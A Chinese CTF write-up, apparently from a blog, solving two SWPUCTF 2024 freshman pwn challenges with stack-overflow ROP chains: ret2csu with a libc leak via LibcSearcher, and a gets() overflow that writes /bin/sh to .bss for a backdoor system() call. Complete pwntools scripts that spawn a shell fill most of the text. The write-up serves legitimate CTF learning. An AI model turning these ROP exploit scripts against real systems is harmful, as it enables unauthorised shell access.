出题人你到底干了什么?

[SWPUCTF 2024 秋季新生赛]出题人你到底干了什么?

准备


64位就开了NX保护

分析

main函数

1
2
3
4
5
6
7
8
9
10
11
12
int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t n; // rax
  _BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF
  char *s; // [rsp+58h] [rbp-8h]

  s = ::s;
  n = strlen(::s);
  write(1, ::s, n);
  read(0, buf, 0x200uLL);
  return 0;
}

读取输入最大512(0x200)个字节到buf,但buf大小为88,所以存在缓冲区溢出

思路:

有想法打write函数的ret2libc,但脚本没调出来,所以先按题目标签的ret2csu打
libc_csu_init函数的汇编重点段


用gdb得到偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
motaly@motaly-VMware-Virtual-Platform:~$ gdb loss
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from loss...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in loss)
------- tip of the day (disable with set show-tips off) -------
Need to mmap or mprotect memory in the debugee? Use commands with the same name to inject and run such syscalls
pwndbg> cyclic 1000
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
pwndbg> r
Starting program: /home/motaly/loss 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
听说你会ret2libc,让我康康!
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011c9 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7fffffffd848 ◂— 0x6261616161616179 ('yaaaaaab')
 RCX  0x7ffff7d1ba61 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x200
 RDI  0
 RSI  0x7fffffffd6c0 ◂— 0x6161616161616161 ('aaaaaaaa')
 R8   0x401240 (__libc_csu_fini) ◂— endbr64 
 R9   0x7ffff7fca380 (_dl_fini) ◂— endbr64 
 R10  0x7ffff7c109d8 ◂— 0x11001200001bd3
 R11  0x246
 R12  1
 R13  0
 R14  0
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP  0x616161616161616d ('maaaaaaa')
 RSP  0x7fffffffd728 ◂— 0x616161616161616e ('naaaaaaa')
 RIP  0x4011c9 (main+83) ◂— ret 
─────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────
 ► 0x4011c9 <main+83>    ret                                <0x616161616161616e>










───────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd728 ◂— 0x616161616161616e ('naaaaaaa')
01:0008│     0x7fffffffd730 ◂— 0x616161616161616f ('oaaaaaaa')
02:0010│     0x7fffffffd738 ◂— 0x6161616161616170 ('paaaaaaa')
03:0018│     0x7fffffffd740 ◂— 0x6161616161616171 ('qaaaaaaa')
04:0020│     0x7fffffffd748 ◂— 0x6161616161616172 ('raaaaaaa')
05:0028│     0x7fffffffd750 ◂— 0x6161616161616173 ('saaaaaaa')
06:0030│     0x7fffffffd758 ◂— 0x6161616161616174 ('taaaaaaa')
07:0038│     0x7fffffffd760 ◂— 0x6161616161616175 ('uaaaaaaa')
─────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
 ► 0         0x4011c9 main+83
   1 0x616161616161616e None
   2 0x616161616161616f None
   3 0x6161616161616170 None
   4 0x6161616161616171 None
   5 0x6161616161616172 None
   6 0x6161616161616173 None
   7 0x6161616161616174 None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Undefined command: "oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae".  Try "help".
pwndbg> cyclic -l 0x616161616161616e
Finding cyclic pattern of 8 bytes: b'naaaaaaa' (hex: 0x6e61616161616161)
Found at offset 104

得到偏移量为104
用ROPgadget获得寄存器

根据ret2csu的知识点写出对应的csu的payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node6.anna.nssctf.cn',21603)
# io=process('/home/motaly/loss')
elf=ELF('/home/motaly/loss')

write_got=elf.got['write']
csu1=0x401226
csu2=0x401210
main=0x401176
rdi=0x401233

def csu(r12,r13,r14,r15,last):
    payload=b'a'*104
    payload+=p64(csu1)+p64(0)
    payload+=p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(csu2)
    payload+=b'a'*56+p64(last)
    io.sendline(payload)

然后正常打ret2libc(这题不用考虑堆栈平衡,不用ret值)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def csu(r12,r13,r14,r15,last):
    payload=b'a'*104
    payload+=p64(csu1)+p64(0)
    payload+=p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(csu2)
    payload+=b'a'*56+p64(last)
    io.sendline(payload)

csu(1,write_got,8,write_got,main)

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base: ' + hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

io.recvuntil(b"!\n")
payload=b'a'*104+p64(rdi)+p64(bin_sh)+p64(system)
io.sendline(payload)

脚本

(libc:libc6_2.31-0ubuntu9.16_amd64)(远程可以,本地有问题)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node6.anna.nssctf.cn',21603)
# io=process('/home/motaly/loss')
elf=ELF('/home/motaly/loss')

write_got=elf.got['write']
csu1=0x401226
csu2=0x401210
main=0x401176
rdi=0x401233

def csu(r12,r13,r14,r15,last):
    payload=b'a'*104
    payload+=p64(csu1)+p64(0)
    payload+=p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(csu2)
    payload+=b'a'*56+p64(last)
    io.sendline(payload)

csu(1,write_got,8,write_got,main)

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base: ' + hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

io.recvuntil(b"!\n")
payload=b'a'*104+p64(rdi)+p64(bin_sh)+p64(system)
io.sendline(payload)

io.interactive()

ret2libc也阴嘛?

[SWPUCTF 2024 秋季新生赛]ret2libc也阴嘛?

准备


64 位,开了 NX 保护

分析

main函数

1
2
3
4
5
6
7
8
int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE v4[48]; // [rsp+0h] [rbp-30h] BYREF

  init(argc, argv, envp);
  gets(v4);
  return 0;
}

gets 函数,所以存在缓冲区溢出

backdoor函数(后门函数)

1
2
3
4
5
__int64 __fastcall backdoor(const char *command)
{
  system(command);
  return 0LL;
}

system 函数

思路:

这题有栈溢出,有 backdoor 函数(后门函数)用 system 函数执行参数内容,所以可以想办法设置这个函数的参数为 /bin/sh ,来获得 shell ,但没其他更多有效信息,所以这里需要进行构造
通过 getsbss 段中一个地址写入 /bin/sh ,再把 bss 段中这个地址设置为 backdoor 函数的参数
先通过 gdb 获得偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
motaly@motaly-VMware-Virtual-Platform:~$ gdb no
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from no...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in no)
------- tip of the day (disable with set show-tips off) -------
Use the context (or ctx) command to display the context once again. You can reconfigure the context layout with set context-section <sections> or forward the output to a file/tty via set context-output <file>. See also config context to configure it further!
pwndbg> cyclic 500
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
pwndbg> r
Starting program: /home/motaly/no 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa

Program received signal SIGSEGV, Segmentation fault.
0x000000000040120d in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7fffffffd848 ◂— 'saaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
 RCX  0x7ffff7e038e0 (_IO_2_1_stdin_) ◂— 0xfbad208b
 RDX  0
 RDI  0x7ffff7e05720 (_IO_stdfile_0_lock) ◂— 0
 RSI  0x7ffff7e03963 (_IO_2_1_stdin_+131) ◂— 0xe05720000000000a /* '\n' */
 R8   0
 R9   0
 R10  0x7ffff7c0e008 ◂— 0x110022000047e8
 R11  0x246
 R12  1
 R13  0
 R14  0
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP  0x6161616161616167 ('gaaaaaaa')
 RSP  0x7fffffffd728 ◂— 0x6161616161616168 ('haaaaaaa')
 RIP  0x40120d (main+45) ◂— ret 
─────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────
 ► 0x40120d <main+45>    ret                                <0x6161616161616168>










──────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd728 ◂— 0x6161616161616168 ('haaaaaaa')
01:0008│     0x7fffffffd730 ◂— 0x6161616161616169 ('iaaaaaaa')
02:0010│     0x7fffffffd738 ◂— 0x616161616161616a ('jaaaaaaa')
03:0018│     0x7fffffffd740 ◂— 0x616161616161616b ('kaaaaaaa')
04:0020│     0x7fffffffd748 ◂— 0x616161616161616c ('laaaaaaa')
05:0028│     0x7fffffffd750 ◂— 0x616161616161616d ('maaaaaaa')
06:0030│     0x7fffffffd758 ◂— 0x616161616161616e ('naaaaaaa')
07:0038│     0x7fffffffd760 ◂— 0x616161616161616f ('oaaaaaaa')
────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40120d main+45
   1 0x6161616161616168 None
   2 0x6161616161616169 None
   3 0x616161616161616a None
   4 0x616161616161616b None
   5 0x616161616161616c None
   6 0x616161616161616d None
   7 0x616161616161616e None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6161616161616168
Finding cyclic pattern of 8 bytes: b'haaaaaaa' (hex: 0x6861616161616161)
Found at offset 56

偏移量为 56
然后通过 ida 查看 backdoor 后门函数地址和 bss 段地址

得到 backdoor 后门函数的地址为 0x4011BD

因为是 64 位程序,所以还要考虑堆栈平衡,并且 gets 函数是一个参数,需要寄存器 rdi ,这里通过 ROPgadget 指令获得相关数据

根据这信息直接构造 payload

1
2
3
4
5
6
7
8
9
10
bss=0x404040+0x100
backdoor = 0x4011bd
gets_plt = elf.plt["gets"]
rdi=0x401273
ret = 0x40101a

payload=b'a'*56+p64(ret)+p64(ret)+p64(rdi)+p64(bss)+p64(gets_plt)+p64(rdi)+p64(bss)+p64(backdoor)
io.sendline(payload)

io.sendline(b"/bin/sh\x00")

这里对 bss 的地址适当的增加,避免直接输入在 bss 开头,破坏了敏感信息和数据结构
(更直白的就是用开头这个地址没打通)
构造的是先寄存器配参数 bss 的地址,给 gets 函数,然后同样的寄存器配参数 bss 的地址,给 backdoor 函数
我们在最后输入 /bin/sh\x00 ,就是往这里 gets(bss)这里输入,然后后面我们设置了 backdoor(bss) ,所以得到了 shell
这里最关键的问题是两次 ret 填充,正常的 64 位程序考虑堆栈平衡,会进行一次的 ret 填充,这里我一开始也是这么写,但没打通,调试了一下,发现程序卡在这里

产生这个报错:这个报错与栈对齐问题有关
所以这里在给一个 ret 值,成功打通

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
context(os='linux',log_level = 'debug',arch='amd64')
# io = remote('node6.anna.nssctf.cn',22138)
io= process('/home/motaly/no')
elf=ELF('/home/motaly/no')

bss=0x404040+0x100
backdoor = 0x4011bd
gets_plt = elf.plt["gets"]
rdi=0x401273
ret = 0x40101a

payload=b'a'*56+p64(ret)+p64(ret)+p64(rdi)+p64(bss)+p64(gets_plt)+p64(rdi)+p64(bss)+p64(backdoor)
io.sendline(payload)

io.sendline(b"/bin/sh\x00")

io.interactive()